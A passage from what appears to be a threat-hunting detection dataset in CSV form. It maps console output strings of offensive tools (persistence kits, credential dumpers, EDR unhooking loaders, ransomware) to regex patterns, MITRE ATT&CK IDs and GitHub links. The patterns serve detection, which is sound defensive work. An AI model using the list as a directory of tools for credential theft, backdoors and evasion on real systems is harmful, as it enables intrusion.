tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","12987" "*[*] Checking access to mailboxes for each email address?*",".{0,1000}\[.{0,1000}\]\sChecking\saccess\sto\smailboxes\sfor\seach\semail\saddress\?.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","12988" "*[*] Downloading the legitimate GPO from SYSVOL*",".{0,1000}\[.{0,1000}\]\sDownloading\sthe\slegitimate\sGPO\sfrom\sSYSVOL.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12989" "*[*] Injecting malicious scheduled task into downloaded GPO*",".{0,1000}\[.{0,1000}\]\sInjecting\smalicious\sscheduled\stask\sinto\sdownloaded\sGPO.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12990" "*[*] Overall compromised accounts: *",".{0,1000}\[.{0,1000}\]\sOverall\scompromised\saccounts\:\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","12991" "*[*] Smuggling in HTML*",".{0,1000}\[.{0,1000}\]\sSmuggling\sin\sHTML.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","12992" "*[*] Smuggling in SVG*",".{0,1000}\[.{0,1000}\]\sSmuggling\sin\sSVG.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","12993" "*[*] Starting full encryption in 5s*",".{0,1000}\[.{0,1000}\]\sStarting\sfull\sencryption\sin\s5s.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","12994" "*[*] Updating downloaded GPO version number to ensure automatic GPO application*",".{0,1000}\[.{0,1000}\]\sUpdating\sdownloaded\sGPO\sversion\snumber\sto\sensure\sautomatic\sGPO\sapplication.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","12995" "*[-] * does not have Service Control Manager write privilege on 
*",".{0,1000}\[\-\]\s.{0,1000}\sdoes\snot\shave\sService\sControl\sManager\swrite\sprivilege\son\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","#content","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","12996" "*[-] Account to kerberoast does not exist!*",".{0,1000}\[\-\]\sAccount\sto\skerberoast\sdoes\snot\sexist!.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","#content","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","12997" "*[-] COM Hijacking failed!*",".{0,1000}\[\-\]\sCOM\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","12998" "*[-] Couldn't change memory protection from RW to RX*",".{0,1000}\[\-\]\sCouldn\'t\schange\smemory\sprotection\sfrom\sRW\sto\sRX.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","12999" "*[-] Couldn't copy dll buffer*",".{0,1000}\[\-\]\sCouldn\'t\scopy\sdll\sbuffer.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13000" "*[-] Couldn't find KaynLoader*",".{0,1000}\[\-\]\sCouldn\'t\sfind\sKaynLoader.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13001" "*[-] Domain switch not provided. Enumerating the Domain Name*",".{0,1000}\[\-\]\sDomain\sswitch\snot\sprovided\.\sEnumerating\sthe\sDomain\sName.{0,1000}","offensive_tool_keyword","Invoke-GrabTheHash","Get the NTLM Hash for the User or Machine Account TGT held in your current session","T1558.004 - T1003.004","TA0006","N/A","N/A","Credential Access","https://github.com/Leo4j/Invoke-GrabTheHash","1","0","#content","N/A","8","1","6","1","2023-10-26T10:52:51Z","2023-08-22T12:14:53Z","13002" "*[-] Dropping DLL failed!*",".{0,1000}\[\-\]\sDropping\sDLL\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","13003" "*[-] Elevating * with DCSync privileges 
failed*",".{0,1000}\[\-\]\sElevating\s.{0,1000}\swith\sDCSync\sprivileges\sfailed.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","#content","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","13004" "*[-] Error authenticating to Empire's RESTful API server*",".{0,1000}\[\-\]\sError\sauthenticating\sto\sEmpire\'s\sRESTful\sAPI\sserver.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13005" "*[-] Exploit failed! 
*",".{0,1000}\[\-\]\sExploit\sfailed!\s.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#content","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","13006" "*[-] Failed to create sudoers backdoor for user *",".{0,1000}\[\-\]\sFailed\sto\screate\ssudoers\sbackdoor\sfor\suser\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13007" "*[-] Failed to decrypt TGT using supplied password/hash. 
If this TGT was requested with no preauth then the password supplied may be incorrect or the data was encrypted with a different type of encryption than expected*",".{0,1000}\[\-\]\sFailed\sto\sdecrypt\sTGT\susing\ssupplied\spassword\/hash\.\sIf\sthis\sTGT\swas\srequested\swith\sno\spreauth\sthen\sthe\spassword\ssupplied\smay\sbe\sincorrect\sor\sthe\sdata\swas\sencrypted\swith\sa\sdifferent\stype\sof\sencryption\sthan\sexpected.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13008" "*[-] Failed to delete Performance DLL*",".{0,1000}\[\-\]\sFailed\sto\sdelete\sPerformance\sDLL.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2008R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#content","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","13009" "*[-] Failed to ReadProcessMemory for g_fParameter_UseLogonCredential*",".{0,1000}\[\-\]\sFailed\sto\sReadProcessMemory\sfor\sg_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#content","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","13010" "*[-] Failed to ReadProcessMemory for 
g_IsCredGuardEnabled*",".{0,1000}\[\-\]\sFailed\sto\sReadProcessMemory\sfor\sg_IsCredGuardEnabled.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#content","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","13011" "*[-] failed to spawn shell: %s*",".{0,1000}\[\-\]\sfailed\sto\sspawn\sshell\:\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","#content","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13012" "*[-] Failed to start reverse shell*",".{0,1000}\[\-\]\sFailed\sto\sstart\sreverse\sshell.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","13013" "*[-] Failed to WriteProcessMemory for g_fParameter_UseLogonCredential*",".{0,1000}\[\-\]\sFailed\sto\sWriteProcessMemory\sfor\sg_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#content","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","13014" "*[-] Failed to WriteProcessMemory for 
g_IsCredGuardEnabled.*",".{0,1000}\[\-\]\sFailed\sto\sWriteProcessMemory\sfor\sg_IsCredGuardEnabled\..{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","#content","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","13015" "*[-] Got error 'LDAP_INSUFFICIENT_ACCESS' when trying to add new KeyCredential*",".{0,1000}\[\-\]\sGot\serror\s\'LDAP_INSUFFICIENT_ACCESS\'\swhen\strying\sto\sadd\snew\sKeyCredential.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13016" "*[-] Got RPC_ACCESS_DENIED!! 
EfsRpcOpenFileRaw is probably PATCHED!*",".{0,1000}\[\-\]\sGot\sRPC_ACCESS_DENIED!!\sEfsRpcOpenFileRaw\sis\sprobably\sPATCHED!.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","#content","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","13017" "*[-] Hijacking failed!*",".{0,1000}\[\-\]\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","13018" "*[-] Inveigh Relay session *",".{0,1000}\[\-\]\sInveigh\sRelay\ssession\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","#content","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","13019" "*[-] kernel not vulnerable*",".{0,1000}\[\-\]\skernel\snot\svulnerable.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","#content","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13021" "*[-] No Kerberoastable accounts found*",".{0,1000}\[\-\]\sNo\sKerberoastable\saccounts\sfound.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#content","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","13022" "*[-] NtAllocateVirtualMemory Hooked*",".{0,1000}\[\-\]\sNtAllocateVirtualMemory\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13023" "*[-] NtProtectVirtualMemory Hooked*",".{0,1000}\[\-\]\sNtProtectVirtualMemory\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13024" "*[-] NtWaitForSingleObject Hooked*",".{0,1000}\[\-\]\sNtWaitForSingleObject\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13025" "*[-] Removed PSRemote Collection*",".{0,1000}\[\-\]\sRemoved\sPSRemote\sCollection.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#content","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","13026" "*[-] Seems like we killed auditd. 
Ooopsie :D*",".{0,1000}\[\-\]\sSeems\slike\swe\skilled\sauditd\.\sOoopsie\s\:D.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","#content","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","13027" "*[-] Shellcode is larger than RX section*",".{0,1000}\[\-\]\sShellcode\sis\slarger\sthan\sRX\ssection.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13028" "*[-] Stopping here, before grabbing the Hash*",".{0,1000}\[\-\]\sStopping\shere,\sbefore\sgrabbing\sthe\sHash.{0,1000}","offensive_tool_keyword","Invoke-GrabTheHash","Get the NTLM Hash for the User or Machine Account TGT held in your current session","T1558.004 - T1003.004","TA0006","N/A","N/A","Credential Access","https://github.com/Leo4j/Invoke-GrabTheHash","1","0","#content","N/A","8","1","6","1","2023-10-26T10:52:51Z","2023-08-22T12:14:53Z","13029" "*[-] Unable to Read LSASS Dump*",".{0,1000}\[\-\]\sUnable\sto\sRead\sLSASS\sDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13030" "*[+] - Bashrc persistence 
added!*",".{0,1000}\[\+\]\s\-\sBashrc\spersistence\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13031" "*[+] - Configuring ~/.bashrc for persistence ... *",".{0,1000}\[\+\]\s\-\sConfiguring\s\~\/\.bashrc\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13032" "*[+] - Linux header / Message Of The Day Persistence*",".{0,1000}\[\+\]\s\-\sLinux\sheader\s\/\sMessage\sOf\sThe\sDay\sPersistence.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13033" "*[+] - Rootkit Configuration*",".{0,1000}\[\+\]\s\-\sRootkit\sConfiguration.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13034" "*[+] - Rootkit configured successfully*",".{0,1000}\[\+\]\s\-\sRootkit\sconfigured\ssuccessfully.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13035" "*[+] - Setting up cronjobs for persistence ... 
*",".{0,1000}\[\+\]\s\-\sSetting\sup\scronjobs\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13036" "*[+] - Systemd Root Level Service successfully configued!*",".{0,1000}\[\+\]\s\-\sSystemd\sRoot\sLevel\sService\ssuccessfully\sconfigued!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13037" "*[+] $bin backdoored successful*",".{0,1000}\[\+\]\s\$bin\sbackdoored\ssuccessful.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13038" "*[+] $binary backdoored 
successful*",".{0,1000}\[\+\]\s\$binary\sbackdoored\ssuccessful.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13039" "*[+] /etc/passwd persistence established!*",".{0,1000}\[\+\]\s\/etc\/passwd\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13040" "*[+] [HELL HALL] pAddress : *",".{0,1000}\[\+\]\s\[HELL\sHALL\]\spAddress\s\:\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","#content","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","13041" "*[+] \u57fa\u4e8esyswhispers\u7684shellcode\u52a0\u8f7d\u5668*",".{0,1000}\[\+\]\s\\u57fa\\u4e8esyswhispers\\u7684shellcode\\u52a0\\u8f7d\\u5668.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#content","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13042" "*[+] 
